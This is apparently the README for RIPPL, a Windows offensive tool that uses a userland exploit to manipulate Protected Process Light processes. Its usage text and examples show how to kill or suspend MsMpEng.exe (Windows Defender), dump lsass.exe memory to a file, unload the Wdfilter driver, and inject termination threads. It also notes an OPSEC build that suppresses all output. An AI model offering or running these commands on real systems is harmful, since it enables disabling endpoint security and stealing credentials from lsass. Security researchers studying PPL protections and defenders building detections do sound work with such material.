
RIPPL

Manipulating PPL protected processes without using a driver


This tool implements a userland exploit to manipulate Windows PPL protected processes. The technique was initially discussed by James Forshaw (a.k.a. @tiraniddo) and Clément Labro (a.k.a. @itm4n) in the following blog posts.

Usage

Warning: the safe version of the binary NEVER outputs anything, as all the strings and print functions are stripped away using conditional compilation macros.

Simply run the executable without any argument and you will get a detailed help/usage message (only valid for binaries compiled without defining the OPSEC macro).

c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter

Contributors

last-byte
